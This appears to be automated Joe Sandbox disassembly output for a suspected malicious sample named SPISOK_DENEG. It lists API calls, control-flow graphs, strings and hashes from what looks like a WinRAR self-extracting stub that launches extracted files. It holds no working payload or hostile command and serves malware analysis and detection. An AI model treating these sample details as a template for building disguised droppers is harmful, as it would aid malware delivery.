                                                            Function 000EB7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000EB7E5
                                                              • Part of subcall function 000D1316: GetDlgItem.USER32(00000000,00003021), ref: 000D135A
                                                              • Part of subcall function 000D1316: SetWindowTextW.USER32(00000000,001035F4), ref: 000D1370
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000EB8D1
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000EB8EF
                                                            • IsDialogMessageW.USER32(?,?), ref: 000EB902
                                                            • TranslateMessage.USER32(?), ref: 000EB910
                                                            • DispatchMessageW.USER32(?), ref: 000EB91A
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 000EB93D
                                                            • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 000EB960
                                                            • GetDlgItem.USER32(?,00000068), ref: 000EB983
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 000EB99E
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,001035F4), ref: 000EB9B1
                                                              • Part of subcall function 000ED453: _wcslen.LIBCMT ref: 000ED47D
                                                            • SetFocus.USER32(00000000), ref: 000EB9B8
                                                            • _swprintf.LIBCMT ref: 000EBA24
                                                              • Part of subcall function 000D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000D40A5
                                                              • Part of subcall function 000ED4D4: GetDlgItem.USER32(00000068,0012FCB8), ref: 000ED4E8
                                                              • Part of subcall function 000ED4D4: ShowWindow.USER32(00000000,00000005,?,?,?,000EAF07,00000001,?,?,000EB7B9,0010506C,0012FCB8,0012FCB8,00001000,00000000,00000000), ref: 000ED510
                                                              • Part of subcall function 000ED4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 000ED51B
                                                              • Part of subcall function 000ED4D4: SendMessageW.USER32(00000000,000000C2,00000000,001035F4), ref: 000ED529
                                                              • Part of subcall function 000ED4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 000ED53F
                                                              • Part of subcall function 000ED4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 000ED559
                                                              • Part of subcall function 000ED4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 000ED59D
                                                              • Part of subcall function 000ED4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 000ED5AB
                                                              • Part of subcall function 000ED4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 000ED5BA
                                                              • Part of subcall function 000ED4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 000ED5E1
                                                              • Part of subcall function 000ED4D4: SendMessageW.USER32(00000000,000000C2,00000000,001043F4), ref: 000ED5F0
                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 000EBA68
                                                            • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 000EBA90
                                                            • GetTickCount.KERNEL32 ref: 000EBAAE
                                                            • _swprintf.LIBCMT ref: 000EBAC2
                                                            • GetLastError.KERNEL32(?,00000011), ref: 000EBAF4
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 000EBB43
                                                            • _swprintf.LIBCMT ref: 000EBB7C
                                                            • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 000EBBD0
                                                            • GetCommandLineW.KERNEL32 ref: 000EBBEA
                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 000EBC47
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 000EBC6F
                                                            • Sleep.KERNEL32(00000064), ref: 000EBCB9
                                                            • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 000EBCE2
                                                            • CloseHandle.KERNEL32(00000000), ref: 000EBCEB
                                                            • _swprintf.LIBCMT ref: 000EBD1E
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000EBD7D
                                                            • SetDlgItemTextW.USER32(?,00000065,001035F4), ref: 000EBD94
                                                            • GetDlgItem.USER32(?,00000065), ref: 000EBD9D
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 000EBDAC
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 000EBDBB
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000EBE68
                                                            • _wcslen.LIBCMT ref: 000EBEBE
                                                            • _swprintf.LIBCMT ref: 000EBEE8
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 000EBF32
                                                            • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 000EBF4C
                                                            • GetDlgItem.USER32(?,00000068), ref: 000EBF55
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 000EBF6B
                                                            • GetDlgItem.USER32(?,00000066), ref: 000EBF85
                                                            • SetWindowTextW.USER32(00000000,0011A472), ref: 000EBFA7
                                                            • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 000EC007
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000EC01A
                                                            • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 000EC0BD
                                                            • EnableWindow.USER32(00000000,00000000), ref: 000EC197
                                                            • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 000EC1D9
                                                              • Part of subcall function 000EC73F: __EH_prolog.LIBCMT ref: 000EC744
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000EC1FD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                            • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                            • API String ID: 3445078344-2238251102
                                                            • Opcode ID: f1fa0e74194581874bd631cab554b88aecb643279704f335088362a7b5eefdda
                                                            • Instruction ID: 223a7ae3b19f8895d25d116f2b111d1befd8e68c608edb54d221c14024486fe3
                                                            • Opcode Fuzzy Hash: f1fa0e74194581874bd631cab554b88aecb643279704f335088362a7b5eefdda
                                                            • Instruction Fuzzy Hash: CB42E370944384BEEB21ABA19D4AFFF7BBCAB01700F048065F644B65D3CBB55A85CB21
                                                            Function 000E0863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 268 e0863-e0886 call eec50 GetModuleHandleW 271 e0888-e089f GetProcAddress 268->271 272 e08e7-e0b48 268->272 275 e08b9-e08c9 GetProcAddress 271->275 276 e08a1-e08b7 271->276 273 e0b4e-e0b59 call f75fb 272->273 274 e0c14-e0c40 GetModuleFileNameW call dc29a call e0602 272->274 273->274 286 e0b5f-e0b8d GetModuleFileNameW CreateFileW 273->286 291 e0c42-e0c4e call db146 274->291 279 e08cb-e08e0 275->279 280 e08e5 275->280 276->275 279->280 280->272 288 e0b8f-e0b9b SetFilePointer 286->288 289 e0c08-e0c0f CloseHandle 286->289 288->289 292 e0b9d-e0bb9 ReadFile 288->292 289->274 298 e0c7d-e0ca4 call dc310 GetFileAttributesW 291->298 299 e0c50-e0c5b call e081b 291->299 292->289 294 e0bbb-e0be0 292->294 296 e0bfd-e0c06 call e0371 294->296 296->289 304 e0be2-e0bfc call e081b 296->304 306 e0cae 298->306 307 e0ca6-e0caa 298->307 299->298 309 e0c5d-e0c7b CompareStringW 299->309 304->296 311 e0cb0-e0cb5 306->311 307->291 310 e0cac 307->310 309->298 309->307 310->311 313 e0cec-e0cee 311->313 314 e0cb7 311->314 316 e0dfb-e0e05 313->316 317 e0cf4-e0d0b call dc2e4 call db146 313->317 315 e0cb9-e0ce0 call dc310 GetFileAttributesW 314->315 323 e0cea 315->323 324 e0ce2-e0ce6 315->324 327 e0d0d-e0d6e call e081b * 2 call de617 call d4092 call de617 call ea7e4 317->327 328 e0d73-e0da6 call d4092 AllocConsole 317->328 323->313 324->315 326 e0ce8 324->326 326->313 334 e0df3-e0df5 ExitProcess 327->334 333 e0da8-e0ded GetCurrentProcessId AttachConsole call f3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->333 328->334 333->334
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32), ref: 000E087C
                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 000E088E
                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 000E08BF
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 000E0B69
                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000E0B83
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 000E0B93
                                                            • ReadFile.KERNEL32(00000000,?,00007FFE,00103C7C,00000000), ref: 000E0BB1
                                                            • CloseHandle.KERNEL32(00000000), ref: 000E0C09
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 000E0C1E
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00103C7C,?,00000000,?,00000800), ref: 000E0C72
                                                            • GetFileAttributesW.KERNELBASE(?,?,00103C7C,00000800,?,00000000,?,00000800), ref: 000E0C9C
                                                            • GetFileAttributesW.KERNEL32(?,?,00103D44,00000800), ref: 000E0CD8
                                                              • Part of subcall function 000E081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000E0836
                                                              • Part of subcall function 000E081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,000DF2D8,Crypt32.dll,00000000,000DF35C,?,?,000DF33E,?,?,?), ref: 000E0858
                                                            • _swprintf.LIBCMT ref: 000E0D4A
                                                            • _swprintf.LIBCMT ref: 000E0D96
                                                              • Part of subcall function 000D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000D40A5
                                                            • AllocConsole.KERNEL32 ref: 000E0D9E
                                                            • GetCurrentProcessId.KERNEL32 ref: 000E0DA8
                                                            • AttachConsole.KERNEL32(00000000), ref: 000E0DAF
                                                            • _wcslen.LIBCMT ref: 000E0DC4
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 000E0DD5
                                                            • WriteConsoleW.KERNEL32(00000000), ref: 000E0DDC
                                                            • Sleep.KERNEL32(00002710), ref: 000E0DE7
                                                            • FreeConsole.KERNEL32 ref: 000E0DED
                                                            • ExitProcess.KERNEL32 ref: 000E0DF5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                            • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                            • API String ID: 1207345701-3298887752
                                                            • Opcode ID: ed20096c313d11f18807298fb94f148a87ae27b8e1768d01670e13eb6b952db4
                                                            • Instruction ID: a8fe8be62c18f84508e89b550738a7575fb2b258cf0b9fc7cbf8d8cef1e523c3
                                                            • Opcode Fuzzy Hash: ed20096c313d11f18807298fb94f148a87ae27b8e1768d01670e13eb6b952db4
                                                            • Instruction Fuzzy Hash: 39D172B1009385AFD3309F51CA89ADFBAECBB85704F50491DF2D5B6191CBF09689CB62
                                                            Function 000EC73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 347 ec73f-ec757 call eeb78 call eec50 352 ed40d-ed418 347->352 353 ec75d-ec787 call eb314 347->353 353->352 356 ec78d-ec792 353->356 357 ec793-ec7a1 356->357 358 ec7a2-ec7b7 call eaf98 357->358 361 ec7b9 358->361 362 ec7bb-ec7d0 call e1fbb 361->362 365 ec7dd-ec7e0 362->365 366 ec7d2-ec7d6 362->366 367 ed3d9-ed404 call eb314 365->367 368 ec7e6 365->368 366->362 369 ec7d8 366->369 367->357 381 ed40a-ed40c 367->381 371 ec9be-ec9c0 368->371 372 eca5f-eca61 368->372 373 eca7c-eca7e 368->373 374 ec7ed-ec7f0 368->374 369->367 371->367 376 ec9c6-ec9d2 371->376 372->367 378 eca67-eca77 SetWindowTextW 372->378 373->367 379 eca84-eca8b 373->379 374->367 377 ec7f6-ec850 call ea64d call dbdf3 call da544 call da67e call d6edb 374->377 382 ec9e6-ec9eb 376->382 383 ec9d4-ec9e5 call f7686 376->383 438 ec98f-ec9a4 call da5d1 377->438 378->367 379->367 380 eca91-ecaaa 379->380 385 ecaac 380->385 386 ecab2-ecac0 call f3e13 380->386 381->352 389 ec9ed-ec9f3 382->389 390 ec9f5-eca00 call eb48e 382->390 383->382 385->386 386->367 401 ecac6-ecacf 386->401 394 eca05-eca07 389->394 390->394 399 eca09-eca10 call f3e13 394->399 400 eca12-eca32 call f3e13 call f3e3e 394->400 399->400 421 eca4b-eca4d 400->421 422 eca34-eca3b 400->422 406 ecaf8-ecafb 401->406 407 ecad1-ecad5 401->407 412 ecb01-ecb04 406->412 414 ecbe0-ecbee call e0602 406->414 411 ecad7-ecadf 407->411 407->412 411->367 417 ecae5-ecaf3 call e0602 411->417 419 ecb06-ecb0b 412->419 420 ecb11-ecb2c 412->420 430 ecbf0-ecc04 call f279b 414->430 417->430 419->414 419->420 433 ecb2e-ecb68 420->433 434 ecb76-ecb7d 420->434 421->367 429 eca53-eca5a call f3e2e 421->429 427 eca3d-eca3f 422->427 428 eca42-eca4a call f7686 422->428 427->428 428->421 429->367 447 ecc06-ecc0a 430->447 448 ecc11-ecc62 call e0602 call eb1be GetDlgItem SetWindowTextW SendMessageW call f3e49 430->448 467 ecb6c-ecb6e 433->467 468 ecb6a 433->468 440 ecb7f-ecb97 call f3e13 434->440 441 ecbab-ecbce call f3e13 * 2 434->441 454 ec9aa-ec9b9 call da55a 438->454 455 ec855-ec869 SetFileAttributesW 438->455 440->441 460 ecb99-ecba6 call e05da 440->460 441->430 474 ecbd0-ecbde call e05da 441->474 447->448 453 ecc0c-ecc0e 447->453 481 ecc67-ecc6b 448->481 453->448 454->367 462 ec90f-ec91f GetFileAttributesW 455->462 463 ec86f-ec8a2 call db991 call db690 call f3e13 455->463 460->441 462->438 466 ec921-ec930 DeleteFileW 462->466 490 ec8a4-ec8b3 call f3e13 463->490 491 ec8b5-ec8c3 call dbdb4 463->491 466->438 475 ec932-ec935 466->475 467->434 468->467 474->430 479 ec939-ec965 call d4092 GetFileAttributesW 475->479 488 ec937-ec938 479->488 489 ec967-ec97d MoveFileW 479->489 481->367 485 ecc71-ecc85 SendMessageW 481->485 485->367 488->479 489->438 492 ec97f-ec989 MoveFileExW 489->492 490->491 497 ec8c9-ec908 call f3e13 call efff0 490->497 491->454 491->497 492->438 497->462
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000EC744
                                                              • Part of subcall function 000EB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 000EB3FB
                                                            • _wcslen.LIBCMT ref: 000ECA0A
                                                            • _wcslen.LIBCMT ref: 000ECA13
                                                            • SetWindowTextW.USER32(?,?), ref: 000ECA71
                                                            • _wcslen.LIBCMT ref: 000ECAB3
                                                            • _wcsrchr.LIBVCRUNTIME ref: 000ECBFB
                                                            • GetDlgItem.USER32(?,00000066), ref: 000ECC36
                                                            • SetWindowTextW.USER32(00000000,?), ref: 000ECC46
                                                            • SendMessageW.USER32(00000000,00000143,00000000,0011A472), ref: 000ECC54
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 000ECC7F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                            • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                            • API String ID: 2804936435-312220925
                                                            • Opcode ID: befabaf28be612c9da30cb997b55eb9e6813229f87485985d8d417e0d3dc4754
                                                            • Instruction ID: de26163b13a3252bc237d5a3d73777bc714d8eb1af0a14395d5a5e2527969373
                                                            • Opcode Fuzzy Hash: befabaf28be612c9da30cb997b55eb9e6813229f87485985d8d417e0d3dc4754
                                                            • Instruction Fuzzy Hash: F8E14272900298AEDB24DBA1DD85DEE73BDAF04350F4440A6F649F7081EB749F858B61
                                                            Function 000DDA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000DDA70
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 000DDAAC
                                                              • Part of subcall function 000DC29A: _wcslen.LIBCMT ref: 000DC2A2
                                                              • Part of subcall function 000E05DA: _wcslen.LIBCMT ref: 000E05E0
                                                              • Part of subcall function 000E1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,000DBAE9,00000000,?,?,?,00010480), ref: 000E1BA0
                                                            • _wcslen.LIBCMT ref: 000DDDE9
                                                            • __fprintf_l.LIBCMT ref: 000DDF1C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                            • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                            • API String ID: 566448164-801612888
                                                            • Opcode ID: 6ca1387d884718d673c867f6d7a5dfe0f6e767daf3c2f440e0c6a55c8b146d00
                                                            • Instruction ID: 2955e4d74615574ae05deb992a55466292a12adda49ee9ab0741acf6d0ae548e
                                                            • Opcode Fuzzy Hash: 6ca1387d884718d673c867f6d7a5dfe0f6e767daf3c2f440e0c6a55c8b146d00
                                                            • Instruction Fuzzy Hash: C932D171A00358EBCF64EF64C845AEE77A9FF14314F40055BFA459B382E7B1A985CB60
                                                            Function 000ED4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 801 ed4d4-ed500 call eb568 GetDlgItem 804 ed536-ed570 SendMessageW * 2 801->804 805 ed502-ed52f call e9285 ShowWindow SendMessageW * 2 801->805 806 ed572-ed58d 804->806 807 ed591-ed5c2 SendMessageW * 3 804->807 805->804 806->807 809 ed5e7-ed5fd SendMessageW 807->809 810 ed5c4-ed5e1 SendMessageW 807->810 810->809
                                                            APIs
                                                              • Part of subcall function 000EB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000EB579
                                                              • Part of subcall function 000EB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000EB58A
                                                              • Part of subcall function 000EB568: IsDialogMessageW.USER32(00010480,?), ref: 000EB59E
                                                              • Part of subcall function 000EB568: TranslateMessage.USER32(?), ref: 000EB5AC
                                                              • Part of subcall function 000EB568: DispatchMessageW.USER32(?), ref: 000EB5B6
                                                            • GetDlgItem.USER32(00000068,0012FCB8), ref: 000ED4E8
                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,000EAF07,00000001,?,?,000EB7B9,0010506C,0012FCB8,0012FCB8,00001000,00000000,00000000), ref: 000ED510
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 000ED51B
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,001035F4), ref: 000ED529
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 000ED53F
                                                            • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 000ED559
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 000ED59D
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 000ED5AB
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 000ED5BA
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 000ED5E1
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,001043F4), ref: 000ED5F0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                            • String ID: \
                                                            • API String ID: 3569833718-2967466578
                                                            • Opcode ID: d2a58046def1bd78da8e2d8159e27253e7feb3deeb1889c59c2bfd0d54a80852
                                                            • Instruction ID: aea630d421f6722691402ea59792ab3c4f9156542ac83c49503a8c3daa94a60f
                                                            • Opcode Fuzzy Hash: d2a58046def1bd78da8e2d8159e27253e7feb3deeb1889c59c2bfd0d54a80852
                                                            • Instruction Fuzzy Hash: 0131F471145742BFE305DF20DC4AFAB7FACEB82718F004509F6A1965E1DB648A48C77A
                                                            Function 000ED78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 836 ed78f-ed7a7 call eec50 839 ed7ad-ed7b9 call f3e13 836->839 840 ed9e8-ed9f0 836->840 839->840 843 ed7bf-ed7e7 call efff0 839->843 846 ed7e9 843->846 847 ed7f1-ed7ff 843->847 846->847 848 ed812-ed818 847->848 849 ed801-ed804 847->849 851 ed85b-ed85e 848->851 850 ed808-ed80e 849->850 853 ed837-ed844 850->853 854 ed810 850->854 851->850 852 ed860-ed866 851->852 855 ed86d-ed86f 852->855 856 ed868-ed86b 852->856 858 ed84a-ed84e 853->858 859 ed9c0-ed9c2 853->859 857 ed822-ed82c 854->857 862 ed882-ed898 call db92d 855->862 863 ed871-ed878 855->863 856->855 856->862 864 ed82e 857->864 865 ed81a-ed820 857->865 860 ed9c6 858->860 861 ed854-ed859 858->861 859->860 869 ed9cf 860->869 861->851 872 ed89a-ed8a7 call e1fbb 862->872 873 ed8b1-ed8bc call da231 862->873 863->862 866 ed87a 863->866 864->853 865->857 868 ed830-ed833 865->868 866->862 868->853 871 ed9d6-ed9d8 869->871 874 ed9da-ed9dc 871->874 875 ed9e7 871->875 872->873 883 ed8a9 872->883 881 ed8be-ed8d5 call db6c4 873->881 882 ed8d9-ed8e6 ShellExecuteExW 873->882 874->875 879 ed9de-ed9e1 ShowWindow 874->879 875->840 879->875 881->882 882->875 885 ed8ec-ed8f9 882->885 883->873 887 ed90c-ed90e 885->887 888 ed8fb-ed902 885->888 890 ed925-ed944 call edc3b 887->890 891 ed910-ed919 887->891 888->887 889 ed904-ed90a 888->889 889->887 892 ed97b-ed987 CloseHandle 889->892 890->892 904 ed946-ed94e 890->904 891->890 900 ed91b-ed923 ShowWindow 891->900 893 ed998-ed9a6 892->893 894 ed989-ed996 call e1fbb 892->894 893->871 899 ed9a8-ed9aa 893->899 894->869 894->893 899->871 903 ed9ac-ed9b2 899->903 900->890 903->871 905 ed9b4-ed9be 903->905 904->892 906 ed950-ed961 GetExitCodeProcess 904->906 905->871 906->892 907 ed963-ed96d 906->907 908 ed96f 907->908 909 ed974 907->909 908->909 909->892
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 000ED7AE
                                                            • ShellExecuteExW.SHELL32(?), ref: 000ED8DE
                                                            • ShowWindow.USER32(?,00000000), ref: 000ED91D
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 000ED959
                                                            • CloseHandle.KERNEL32(?), ref: 000ED97F
                                                            • ShowWindow.USER32(?,00000001), ref: 000ED9E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                            • String ID: .exe$.inf
                                                            • API String ID: 36480843-3750412487
